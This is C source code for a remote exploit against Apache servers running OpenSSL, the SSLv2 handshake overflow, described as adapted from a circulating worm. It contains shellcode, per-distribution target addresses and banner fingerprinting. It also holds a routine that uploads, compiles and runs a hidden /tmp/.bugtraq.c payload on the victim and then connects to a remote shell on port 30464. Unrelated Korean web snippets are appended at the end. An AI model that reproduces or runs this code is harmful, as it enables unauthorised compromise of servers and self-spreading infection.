/************************************************************************
*
* LINUX
X86 APACHE REMOTE EXPLOIT!!!!!!!!!
*
*
*
* This is the
unpublished source for apache OpenSSL handshake exploit.
* We obtained this
exploit by modifying a circulating apache worm,
* created by
contem@efnet
*
* BY
*
*
* nebunu <nebunu at
home.ro>
*
* compile: gcc -o apache-ex apache.ex.c
-lcrypto
* run: ./apache-ex <IP>
* do not use hostname! use only
ip
*
* If successfully it will spawn a shell on port 30464 and then
connect to it.
* Then use another exploit to get r00t
*
*
btw,/tmp/.bugtraq.c is blackhole.c,rename /tmp/.bugtraq.c and
* for this to
work,and dont forget to set it on port 30464
! PRIVATE PRIVATE PRIVATE
PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
!
*
*************************************************************************/
#include
<stdio.h>
#include <unistd.h>
#include
<string.h>
#include <fcntl.h>
#include
<stdlib.h>
#include <stdarg.h>
#include
<sys/ioctl.h>
#include <sys/types.h>
#include
<sys/socket.h>
#include <netinet/in.h>
#include
<sys/time.h>
#include <unistd.h>
#include
<errno.h>
#include <netdb.h>
#include
<arpa/telnet.h>
#include <sys/wait.h>
#include
<signal.h>
#include <openssl/ssl.h>
#include
<openssl/rsa.h>
#include <openssl/x509.h>
#include
<openssl/evp.h>
int pizda;
int conectare(char *ip, int
port)
{
struct sockaddr_in addr;
int pizda;
pizda = socket(AF_INET,
SOCK_STREAM, 0);
if(pizda ==
-1)
{
perror("socket()");
exit(-1);
}
addr.sin_addr.s_addr =
inet_addr(ip);
addr.sin_family = AF_INET;
addr.sin_port =
htons(port);
if(connect(pizda,(struct sockaddr *)&addr,sizeof(struct
sockaddr_in)) == -1)
return -1;
return(pizda);
}
void
pulamea(int pizda)
{
int n;
char recvbuf[1024],
*cmd = "id; uname -a\n";
fd_set rset;
send(pizda, cmd,
strlen(cmd), 0);
while (1)
{
FD_ZERO(&rset);
FD_SET(pizda,
&rset);
FD_SET(STDIN_FILENO, &rset);
select(pizda+1, &rset,
NULL, NULL, NULL);
if(FD_ISSET(pizda, &rset))
{
n = read(pizda,
recvbuf, 1024);
if (n <= 0)
{
printf("Connection closed by foreign
host!\n");
exit(0);
}
recvbuf[n] = 0;
printf("%s",
recvbuf);
}
if (FD_ISSET(STDIN_FILENO, &rset))
{
n =
read(STDIN_FILENO, recvbuf, 1024);
if (n > 0)
{
recvbuf[n] =
0;
write(pizda, recvbuf,
n);
}
}
}
return;
}
void cleanup(char *buf)
{
while(buf[strlen(buf)-1] == '\n' || buf[strlen(buf)-1] == '\r' ||
buf[strlen(buf)-1]
== ' ') buf[strlen(buf)-1] = 0;
while(*buf == '\n' ||
*buf == '\r' || *buf == ' ')
{
unsigned long i;
for
(i=strlen(buf)+1;i>0;i--) buf[i-1]=buf[i];
}
}
char
*GetAddress(char *ip) {
struct sockaddr_in sin;
fd_set fds;
int
n,d,sock;
char buf[1024];
struct timeval tv;
sock = socket(PF_INET,
SOCK_STREAM, 0);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr =
inet_addr(ip);
sin.sin_port = htons(80);
if(connect(sock, (struct sockaddr
*) & sin, sizeof(sin)) != 0) return NULL;
write(sock,"GET /
HTTP/1.1\r\n\r\n",strlen("GET / HTTP/1.1\r\n\r\n"));
tv.tv_sec =
15;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock,
&fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds,
NULL, NULL, &tv) > 0) {
if(FD_ISSET(sock, &fds))
{
if((n =
read(sock, buf, sizeof(buf) - 1)) < 0) return NULL;
for (d=0;d<n;d++)
if (!strncmp(buf+d,"Server: ",strlen("Server: "))) {
char
*start=buf+d+strlen("Server: ");
for (d=0;d<strlen(start);d++) if
(start[d] == '\n') start[d]=0;
cleanup(start);
return
strdup(start);
}
}
}
return
NULL;
}
#define ENC(c) ((c) ? ((c) & 077) + ' ':
'`')
int sendch(int sock,int buf) {
char a[2];
int b=1;
if
(buf == '`' || buf == '\\' || buf == '$')
{
a[0]='\\';
a[1]=0;
b=write(sock,a,1);
}
if (b <= 0) return
b;
a[0]=buf;
a[1]=0;
return write(sock,a,1);
}
int
writem(int sock, char *str) {
return
write(sock,str,strlen(str));
}
int encode(int a) {
register int
ch, n;
register char *p;
char buf[80];
FILE *in;
if
((in=fopen("/tmp/.bugtraq.c","r")) == NULL) return 0;
writem(a,"begin 655
.bugtraq.c\n");
while ((n = fread(buf, 1, 45, in)))
{
ch =
ENC(n);
if (sendch(a,ch) <= 0) break;
for (p = buf; n > 0; n -= 3, p
+= 3)
{
if (n < 3) {
p[2] = '\0';
if (n < 2) p[1] =
'\0';
}
ch = *p >> 2;
ch = ENC(ch);
if (sendch(a,ch) <= 0)
break;
ch = ((*p << 4) & 060) | ((p[1] >> 4) &
017);
ch = ENC(ch);
if (sendch(a,ch) <= 0) break;
ch = ((p[1]
<< 2) & 074) | ((p[2] >> 6) & 03);
ch = ENC(ch);
if
(sendch(a,ch) <= 0) break;
ch = p[2] & 077;
ch = ENC(ch);
if
(sendch(a,ch) <= 0) break;
}
ch='\n';
if (sendch(a,ch) <= 0)
break;
usleep(10);
}
if (ferror(in)) {
fclose(in);
return
0;
}
ch = ENC('\0');
sendch(a,ch);
ch =
'\n';
sendch(a,ch);
writem(a,"end\n");
if (in) fclose(in);
return
1;
}
#define MAX_ARCH 21
struct archs {
char
*os;
char *apache;
int func_addr;
} architectures[] =
{
{"Gentoo", "", 0x08086c34},
{"Debian", "1.3.26",
0x080863cc},
{"Red-Hat", "1.3.6", 0x080707ec},
{"Red-Hat",
"1.3.9", 0x0808ccc4},
{"Red-Hat", "1.3.12",
0x0808f614},
{"Red-Hat", "1.3.12",
0x0809251c},
{"Red-Hat", "1.3.19",
0x0809af8c},
{"Red-Hat", "1.3.20",
0x080994d4},
{"Red-Hat", "1.3.26",
0x08161c14},
{"Red-Hat", "1.3.23",
0x0808528c},
{"Red-Hat", "1.3.22", 0x0808400c},
{"SuSE",
"1.3.12", 0x0809f54c},
{"SuSE", "1.3.17",
0x08099984},
{"SuSE", "1.3.19", 0x08099ec8},
{"SuSE",
"1.3.20", 0x08099da8},
{"SuSE", "1.3.23",
0x08086168},
{"SuSE", "1.3.23", 0x080861c8},
{"Mandrake",
"1.3.14", 0x0809d6c4},
{"Mandrake", "1.3.19",
0x0809ea98},
{"Mandrake", "1.3.20",
0x0809e97c},
{"Mandrake", "1.3.23",
0x08086580},
{"Slackware", "1.3.26",
0x083d37fc},
{"Slackware", "1.3.26",0x080b2100}
};
extern
int errno;
int cipher;
int ciphers;
#define
FINDSCKPORTOFS 208 + 12 + 46
unsigned char
overwrite_session_id_length[]
=
"AAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"\x70\x00\x00\x00";
unsigned
char overwrite_next_chunk[]
=
"AAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAA"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"AAAA"
"\x01\x00\x00\x00"
"AAAA"
"AAAA"
"AAAA"
"\x00\x00\x00\x00"
"AAAA"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"AAAAAAAA"
"\x00\x00\x00\x00"
"\x11\x00\x00\x00"
"fdfd"
"bkbk"
"\x10\x00\x00\x00"
"\x10\x00\x00\x00"
"\xeb\x0a\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x31\xdb"
"\x89\xe7"
"\x8d\x77\x10"
"\x89\x77\x04"
"\x8d\x4f\x20"
"\x89\x4f\x08"
"\xb3\x10"
"\x89\x19"
"\x31\xc9"
"\xb1\xff"
"\x89\x0f"
"\x51"
"\x31\xc0"
"\xb0\x66"
"\xb3\x07"
"\x89\xf9"
"\xcd\x80"
"\x59"
"\x31\xdb"
"\x39\xd8"
"\x75\x0a"
"\x66\xb8\x12\x34"
"\x66\x39\x46\x02"
"\x74\x02"
"\xe2\xe0"
"\x89\xcb"
"\x31\xc9"
"\xb1\x03"
"\x31\xc0"
"\xb0\x3f"
"\x49"
"\xcd\x80"
"\x41"
"\xe2\xf6"
"\x31\xc9"
"\xf7\xe1"
"\x51"
"\x5b"
"\xb0\xa4"
"\xcd\x80"
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80";
#define
BUFSIZE 16384
#define CHALLENGE_LENGTH 16
#define RC4_KEY_LENGTH
16
#define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
#define
n2s(c,s) ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned
int)(c[1]))
)),c+=2)
#define s2n(s,c) ((c[0]=(unsigned
char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s)
)&0xff)),c+=2)
typedef struct {
int
sock;
unsigned char challenge[CHALLENGE_LENGTH];
unsigned
char master_key[RC4_KEY_LENGTH];
unsigned char
key_material[RC4_KEY_MATERIAL_LENGTH];
int
conn_id_length;
unsigned char
conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
X509
*x509;
unsigned char* read_key;
unsigned char*
write_key;
RC4_KEY* rc4_read_key;
RC4_KEY*
rc4_write_key;
int read_seq;
int write_seq;
int
encrypted;
} ssl_conn;
long getip(char *hostname) {
struct hostent
*he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he
= gethostbyname(hostname)) == NULL) exit(-1);
memcpy(&ipaddr,
he->h_addr, he->h_length);
}
return ipaddr;
}
int
sh(int sockfd) {
char rcv[1024];
fd_set rset;
int maxfd,
n;
alarm(3600);
writem(sockfd,"TERM=xterm; export TERM=xterm; exec bash
-i\n");
writem(sockfd,"rm -rf /tmp/.bugtraq.c;cat > /tmp/.uubugtraq
<<
__eof__;\n");
encode(sockfd);
writem(sockfd,"__eof__\n");
memset(rcv,0,1024);
sprintf(rcv,"/usr/bin/uudecode
-o /tmp/.bugtraq.c /tmp/.uubugtraq;gcc -
o /tmp/.bugtraq
/tmp/.bugtraq.c;/tmp/.bugtraq;exit;\n");
writem(sockfd,rcv);
for (;;)
{
FD_ZERO(&rset);
FD_SET(sockfd, &rset);
select(sockfd+1,
&rset, NULL, NULL, NULL);
if (FD_ISSET(sockfd, &rset)) if ((n =
read(sockfd, rcv, sizeof(rcv))) == 0) return 0;
}
}
int
get_local_port(int sock) {
struct sockaddr_in s_in;
unsigned int namelen =
sizeof(s_in);
if (getsockname(sock, (struct sockaddr *)&s_in,
&namelen) < 0) exit(1);
return s_in.sin_port;
}
int
connect_host(char* host, int port) {
struct sockaddr_in s_in;
int
sock;
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr =
getip(host);
s_in.sin_port = htons(port);
if ((sock = socket(AF_INET,
SOCK_STREAM, 0)) <= 0) exit(1);
alarm(10);
if (connect(sock, (struct
sockaddr *)&s_in, sizeof(s_in)) < 0) exit(1);
alarm(0);
return
sock;
}
ssl_conn* ssl_connect_host(char* host, int port)
{
ssl_conn* ssl;
if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn))))
exit(1);
ssl->encrypted = 0;
ssl->write_seq = 0;
ssl->read_seq
= 0;
ssl->sock = connect_host(host, port);
return ssl;
}
char
res_buf[30];
int read_data(int sock, unsigned char* buf, int len)
{
int l;
int to_read = len;
do {
if ((l = read(sock, buf, to_read))
< 0) exit(1);
to_read -= len;
}
while (to_read > 0);
return
len;
}
int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int
buf_size) {
int rec_len, padding;
read_data(ssl->sock, buf, 2);
if
((buf[0] & 0x80) == 0) {
rec_len = ((buf[0] & 0x3f) << 8) |
buf[1];
read_data(ssl->sock, &buf[2], 1);
padding =
(int)buf[2];
}
else
{
rec_len = ((buf[0] & 0x7f) << 8) |
buf[1];
padding = 0;
}
if ((rec_len <= 0) || (rec_len >
buf_size)) exit(1);
read_data(ssl->sock, buf, rec_len);
if
(ssl->encrypted)
{
if (MD5_DIGEST_LENGTH + padding >= rec_len)
{
if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) return 0;
else
exit(1);
}
RC4(ssl->rc4_read_key, rec_len, buf, buf);
rec_len =
rec_len - MD5_DIGEST_LENGTH - padding;
memmove(buf, buf + MD5_DIGEST_LENGTH,
rec_len);
}
if (buf[0] == SSL2_MT_ERROR) {
if (rec_len != 3)
exit(1);
else return 0;
}
return rec_len;
}
void
send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len) {
unsigned
char buf[BUFSIZE];
unsigned char* p;
int tot_len;
MD5_CTX ctx;
int
seq;
if (ssl->encrypted) tot_len = rec_len + MD5_DIGEST_LENGTH;
else
tot_len = rec_len;
if (2 + tot_len > BUFSIZE) exit(1);
p =
buf;
s2n(tot_len, p);
buf[0] = buf[0] | 0x80;
if (ssl->encrypted)
{
seq =
ntohl(ssl->write_seq);
MD5_Init(&ctx);
MD5_Update(&ctx,
ssl->write_key, RC4_KEY_LENGTH);
MD5_Update(&ctx, rec,
rec_len);
MD5_Update(&ctx, &seq, 4);
MD5_Final(p,
&ctx);
p+=MD5_DIGEST_LENGTH;
memcpy(p, rec,
rec_len);
RC4(ssl->rc4_write_key, tot_len, &buf[2],
&buf[2]);
}
else memcpy(p, rec, rec_len);
send(ssl->sock, buf, 2
+ tot_len, 0);
ssl->write_seq++;
}
void
send_client_hello(ssl_conn *ssl) {
int i;
unsigned char buf[BUFSIZE]
=
"\x01"
"\x00\x02"
"\x00\x18"
"\x00\x00"
"\x00\x10"
"\x07\x00\xc0\x05\x00\x80\x03\x00"
"\x80\x01\x00\x80\x08\x00\x80\x06"
"\x00\x40\x04\x00\x80\x02\x00\x80"
"";
for
(i = 0; i < CHALLENGE_LENGTH; i++) ssl->challenge[i] = (unsigned char)
(rand() >>
24);
memcpy(&buf[33], ssl->challenge,
CHALLENGE_LENGTH);
send_ssl_packet(ssl, buf, 33 +
CHALLENGE_LENGTH);
}
void get_server_hello(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
unsigned char *p, *end;
int len;
int
server_version, cert_length, cs_length, conn_id_length;
int found;
if
(!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) exit(1);
if (len < 11)
exit(1);
p = buf;
if (*(p++) != SSL2_MT_SERVER_HELLO) exit(1);
if
(*(p++) != 0) exit(1);
if (*(p++) != 1) exit(1);
n2s(p,
server_version);
if (server_version != 2) exit(1);
n2s(p,
cert_length);
n2s(p, cs_length);
n2s(p, conn_id_length);
if (len != 11
+ cert_length + cs_length + conn_id_length) exit(1);
ssl->x509 =
NULL;
ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
if
(ssl->x509 == NULL) exit(1);
if (cs_length % 3 != 0) exit(1);
found =
0;
for (end=p+cs_length; p < end; p += 3) if ((p[0] == 0x01) &&
(p[1] == 0x00) && (p[2]
== 0x80)) found = 1;
if (!found)
exit(1);
if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH)
exit(1);
ssl->conn_id_length = conn_id_length;
memcpy(ssl->conn_id,
p, conn_id_length);
}
void send_client_master_key(ssl_conn* ssl,
unsigned char* key_arg_overwrite, int
key_arg_overwrite_len) {
int
encrypted_key_length, key_arg_length, record_length;
unsigned char* p;
int
i;
EVP_PKEY *pkey=NULL;
unsigned char buf[BUFSIZE]
=
"\x02"
"\x01\x00\x80"
"\x00\x00"
"\x00\x40"
"\x00\x08";
p
= &buf[10];
for (i = 0; i < RC4_KEY_LENGTH; i++) ssl->master_key[i]
= (unsigned char) (rand() >>
24);
pkey=X509_get_pubkey(ssl->x509);
if (!pkey) exit(1);
if
(pkey->type != EVP_PKEY_RSA) exit(1);
encrypted_key_length =
RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10],
pkey->pkey.rsa, RSA_PKCS1_PADDING);
if (encrypted_key_length <= 0)
exit(1);
p += encrypted_key_length;
if (key_arg_overwrite) {
for (i =
0; i < 8; i++) *(p++) = (unsigned char) (rand() >> 24);
memcpy(p,
key_arg_overwrite, key_arg_overwrite_len);
key_arg_length = 8 +
key_arg_overwrite_len;
}
else key_arg_length = 0;
p =
&buf[6];
s2n(encrypted_key_length, p);
s2n(key_arg_length,
p);
record_length = 10 + encrypted_key_length +
key_arg_length;
send_ssl_packet(ssl, buf,
record_length);
ssl->encrypted = 1;
}
void
generate_key_material(ssl_conn* ssl) {
unsigned int i;
MD5_CTX
ctx;
unsigned char *km;
unsigned char
c='0';
km=ssl->key_material;
for (i=0; i<RC4_KEY_MATERIAL_LENGTH;
i+=MD5_DIGEST_LENGTH)
{
MD5_Init(&ctx);
MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
MD5_Update(&ctx,&c,1);
c++;
MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
MD5_Update(&ctx,ssl->conn_id,
ssl->conn_id_length);
MD5_Final(km,&ctx);
km+=MD5_DIGEST_LENGTH;
}
}
void
generate_session_keys(ssl_conn* ssl)
{
generate_key_material(ssl);
ssl->read_key =
&(ssl->key_material[0]);
ssl->rc4_read_key = (RC4_KEY*)
malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH,
ssl->read_key);
ssl->write_key =
&(ssl->key_material[RC4_KEY_LENGTH]);
ssl->rc4_write_key =
(RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_write_key,
RC4_KEY_LENGTH, ssl->write_key);
}
void get_server_verify(ssl_conn*
ssl) {
unsigned char buf[BUFSIZE];
int len;
if (!(len =
read_ssl_packet(ssl, buf, sizeof(buf)))) exit(1);
if (len != 1 +
CHALLENGE_LENGTH) exit(1);
if (buf[0] != SSL2_MT_SERVER_VERIFY)
exit(1);
if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH))
exit(1);
}
void send_client_finished(ssl_conn* ssl) {
unsigned char
buf[BUFSIZE];
buf[0] = SSL2_MT_CLIENT_FINISHED;
memcpy(&buf[1],
ssl->conn_id, ssl->conn_id_length);
send_ssl_packet(ssl, buf,
1+ssl->conn_id_length);
}
void get_server_finished(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
int i;
if (!(len =
read_ssl_packet(ssl, buf, sizeof(buf)))) exit(1);
if (buf[0] !=
SSL2_MT_SERVER_FINISHED) exit(1);
if (len <= 112) exit(1);
cipher =
*(int*)&buf[101];
ciphers = *(int*)&buf[109];
}
void
get_server_error(ssl_conn* ssl) {
unsigned char buf[BUFSIZE];
int
len;
if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0)
exit(1);
}
void exploit(char *ip) {
int port = 443;
int
i;
int arch=-1;
int N = 20;
ssl_conn* ssl1;
ssl_conn* ssl2;
char
*a;
alarm(3600);
if ((a=GetAddress(ip)) == NULL) exit(0);
if
(strncmp(a,"Apache",6)) exit(0);
for (i=0;i<MAX_ARCH;i++) {
if
(strstr(a,architectures[i].apache) && strstr(a,architectures[i].os))
{
arch=i;
break;
}
}
if (arch == -1)
arch=9;
srand(0x31337);
for (i=0; i<N; i++) {
connect_host(ip,
port);
usleep(100000);
}
ssl1 = ssl_connect_host(ip, port);
ssl2
= ssl_connect_host(ip,
port);
send_client_hello(ssl1);
get_server_hello(ssl1);
send_client_master_key(ssl1,
overwrite_session_id_length,
sizeof
(overwrite_session_id_length)-1);
generate_session_keys(ssl1);
get_server_verify(ssl1);
send_client_finished(ssl1);
get_server_finished(ssl1);
port
= get_local_port(ssl2->sock);
overwrite_next_chunk[FINDSCKPORTOFS] =
(char) (port & 0xff);
overwrite_next_chunk[FINDSCKPORTOFS+1] = (char)
((port >> 8) & 0xff);
*(int*)&overwrite_next_chunk[156] =
cipher;
*(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr
- 12;
*(int*)&overwrite_next_chunk[196] = ciphers +
16;
send_client_hello(ssl2);
get_server_hello(ssl2);
send_client_master_key(ssl2,
overwrite_next_chunk,
sizeof(overwrite_next_chunk)-1);
generate_session_keys(ssl2);
get_server_verify(ssl2);
for
(i = 0; i < ssl2->conn_id_length; i++) ssl2->conn_id[i] = (unsigned
char) (rand()
>>
24);
send_client_finished(ssl2);
get_server_error(ssl2);
sh(ssl2->sock);
close(ssl2->sock);
close(ssl1->sock);
exit(0);
}
main(int
argc,char **argv[])
{
if (argc!=2)
{
printf("AVAILABLE
TARGETS:\n
1) Gentoo, apache, 0x08086c34
2)
Debian, apache 1.3.26, 0x080863cc
3) Red-Hat, apache 1.3.6,
0x080707ec
4) Red-Hat, apache 1.3.9, 0x0808ccc4
5) Red-Hat,
apache 1.3.12, 0x0808f614
6) Red-Hat, apache 1.3.12, 0x0809251c
7)
Red-Hat, apache 1.3.19, 0x0809af8c
8) Red-Hat, apache
1.3.20, 0x080994d4
9) Red-Hat, apache
1.3.26, 0x08161c14
10) Red-Hat, apache
1.3.23, 0x0808528c
11) Red-Hat, apache
1.3.22, 0x0808400c
12) SuSE, apache
1.3.12, 0x0809f54c
13) SuSE, apache
1.3.17, 0x08099984
14) SuSE, apache
1.3.19, 0x08099ec8
15) SuSE, apache
1.3.20, 0x08099da8
16) SuSE, apache
1.3.23, 0x08086168
17) SuSE, apache
1.3.23, 0x080861c8
18) Mandrake, apache
1.3.14, 0x0809d6c4
19) Mandrake, apache
1.3.19, 0x0809ea98
20) Mandrake, apache
1.3.20, 0x0809e97c
21) Mandrake, apache
1.3.23, 0x08086580
22) Slackware, apache
1.3.26, 0x083d37fc
23) Slackware, apache
1.3.26, 0x080b2100
Adapted after a apache worm by contem@efnet
by
nebunu <nebunu at home.ro>
DrBios <cosmin800 at
hotmail.com>
Usage: ./apache-ex
<IP>
\n\n");
exit(0);
}
printf("Exploiting %s , nebunu
rulez!\n..",argv[1]);
exploit(argv[1]);
sleep(3);
printf("Connecting to
shell on port
30464\n...");
pizda=conectare(argv[1],30464);
pulamea(pizda);
}
-
뉴스출처 : http://news.naver.com/main/read.nhn?mode=LSD&mid=sec&oid=023&aid=0002991158&sid1=001 내 배우자가 바람을 피우는 것이 확실할까. 심증...
-
PHPSCHOOL ( http://www.phpschool.com ) 국내 1위의 PHP 개발자 커뮤니티 사이트이다. PHP Builder ( http://www.phpbuilder.com ) PHP 최고 사이트라고 해도 과언이 아니며, 새로운 P...
